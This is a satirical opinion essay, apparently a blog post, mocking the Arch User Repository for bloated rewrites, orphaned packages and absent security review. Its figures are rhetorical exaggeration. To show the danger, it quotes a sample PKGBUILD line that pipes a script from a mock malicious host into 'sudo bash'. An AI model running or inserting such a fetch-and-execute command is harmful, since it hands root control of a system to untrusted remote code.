The AUR

Linux gained popularity as Desktop OS. Then they discovered they could upload code.

The Arch User Repository. Supposed to be community packages. What it is: 90,000 packages, 84,900 of which are some teenager’s homework.

Every Unix tool that worked since 1978 now has seventeen rewrites: - ls → exa, lsd, nat (all “blazingly fast”) - cat → bat, ccat, lolcat (because cat needs syntax highlighting) - grep → ripgrep, ag, ack (grep wasn’t fast enough apparently)

Original ls: 51KB, works everywhere. exa: 1.4MB, breaks when you update Rust.

But it has colors!

Let’s talk about what’s inside these PKGBUILDS:

curl -s https://totallynotmalware.ru/install.sh | sudo bash

Twelve thousand people installed it. Because yay -S doesn’t show you what it’s doing. Just downloads and runs. As root.

The AUR helpers made it worse. Used to be you’d read the PKGBUILD. Now? yay -Syu --noconfirm. Might as well run curl | sudo bash directly. Same thing.

Hyprland brought the ricers. Now the AUR is full of: - Wallpaper daemons that use more CPU than your actual programs - Bar programs that need 400MB RAM to display the time - Rofi forks that are incompatible with everything including themselves - Window borders that require GPU acceleration

All maintained by someone who’ll abandon it the moment they discover girls.

Half the AUR is orphaned. Maintainer graduated, got a job, realized maintaining discord-anime-mod-git doesn’t pay rent.

Package still there. Still has votes. PKGBUILD from 2019. Probably mining crypto. Nobody knows. Nobody checks.

yay -S whatever. What could go wrong?

The official repos have everything you need. Really. That terminal emulator written in Rust? You don’t need it. Use xterm. Or urxvt. Or the one you already have.

That system monitor with animations? You don’t need it. Use htop. Or top. Or ps.

That file manager with tabs and plugins and themes? You don’t need it. Use ls and cd. Like an adult.

Know what’s funny? These kids rice their Arch setups, install 400 AUR packages, then complain Windows is bloated.

Your neofetch replacement is 100MB. Windows system32 is calling, it wants its bloat back.

The AUR is NPM for your operating system. Every package depends on twelve others. Those depend on fifty more. Installing a shell script pulls in electron, chromium, nodejs, and somehow PHP.

Could have been one file in /usr/local/bin. Instead it’s a “project.” With CI/CD. With unit tests that don’t run. With documentation that says “WIP.” With issues full of “doesn’t work” and responses of “works on my machine btw i use arch.”

Here’s the thing about security: There is none.

Anyone can upload anything. No review. No audit. No checking. Just faith that nobody would upload malware to a repository with zero oversight.

That faith is misplaced.

I’ve seen PKGBUILDs that: - Download binaries over HTTP - Add users to sudoers - Phone home with your data - Run mysterious scripts from pastebin - Accidently (bug?) delete your home directory (“cleaning build artifacts”)

But hey, it has 500 votes. Must be safe.

The original Unix philosophy: small tools that do one thing well.

The AUR philosophy: rewrite everything in Rust, make it 100x larger, add features nobody wants, abandon it after two months.

Progress.

You want to know what’s in the AUR that’s actually useful? About twenty packages. Proprietary stuff that can’t be in main repos. Weird drivers for ancient hardware. That’s it.

The rest? Homework. Experiments. Malware. Abandoned projects. Rust rewrites of things that already worked.

But sure, install that Discord mod. Install that terminal that needs a GPU. Install that fetch script that’s somehow 400MB.

Just don’t complain when your system breaks. You were warned. Right here. Right now.